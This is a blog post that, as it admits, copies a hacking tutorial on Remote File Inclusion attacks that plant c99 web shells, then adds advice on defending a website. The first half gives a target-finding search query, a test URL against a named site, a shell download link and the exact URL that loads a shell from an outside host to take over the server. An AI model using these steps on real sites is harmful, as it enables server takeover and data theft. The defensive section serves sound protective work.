By Doug Mewis

How Hackers Hack a Website Using Remote File Inclusion

(I actually stole much of this text from a hacking website while I was preparing security on a software application I am working on.)

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.  RFI is the main method of implementing a C99 website attack but not the only one.
Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly  use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com. So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack. Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://downloads.ziddu.com/downloadfile/12628679/c99shell.rar.html

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc. Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/rafaybaloch/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it
What is the defense against C99 website attacks?
First read the article on Remote File Inclusion.  The above is exactly the method I explained in the article on RFI attacks.  C99 attacks go a step further by injecting shell script onto your websites.
Change your passwords regularly.  Hackers who are unable to attack your website using RFI methods will try to hack vulnerable websites using weak password security methods.  Set a minimum length on your password and require a mix of upper and lowercase letters plus some numerical characters.  Special characters help but sometimes people prefer not to have to use them.  I recommend a setting that requires both upper and lower characters plus at least one numerical one.  Key here is do not use common words.  You may want to filter out words not allowed such as the user name or any information in the user profile.
If you suspect you have experienced a C99 attack (you will know by looking for files you didn’t add in your website root normally), notify your host via a support ticket and request help.  They will run security software against your website and remove malicious script for you.  This takes time and professional skills you may or may not have.  You may have to reinstall your whole website from back ups so be prepared.
Back up your website regularly.  You should do this after each major website script installation or modification and at regular intervals at least once monthly.  You should maintain backup copies going back at least one
year in case you need to resort to older versions.  This also includes backing up your database.
Ask your host about mod_security.  Make sure it is installed to disallow malicious use of URL parameters.
If you experienced a C99 attack, notify your users as their information is likely compromised.  They need to take action to change their passwords and make sure their own websites are protected.  More likely it’s their personal information that is compromised if you store it on the server.  They have to know in order to protect themselves.  If you do not store personal information, my recommendation is to force all users to change their passwords and implement password strength security methods.
Google up root_kit scanners.  Your website may need to install it if you don’t have root access.  If you are on a shared account, ask your host if they use it and how often.
Monitor your traffic logs.  Most people have these logs sitting on their web servers but never take a look at things until something breaks.  Monitor your traffic regular and watch for suspicious activity.  Log failed login attempts and record the IP at the time. Record “forbidden” and “page not found” errors along with time, date, and IP.  This will at least give you an idea where an attack may of come from.  Hacking attempts usually form a pattern that if you logged them, you could potentially know where they are coming from and figure out from there what to do about it, or what questions to ask.  Most attacks will come from free proxy services that hackers use, so I would be alert if any connection via proxy is attempted.

Incoming search terms:

  • c99 site
  • shell 99 change index php
  • how to use shell c99
  • Webshell c99
  • how yo use ripway com go hack websites
  • how to upload shell c99
  • protect website against c99 r57
  • protecting c99 shells with passwords
  • site for c99
  • upload c99 forcely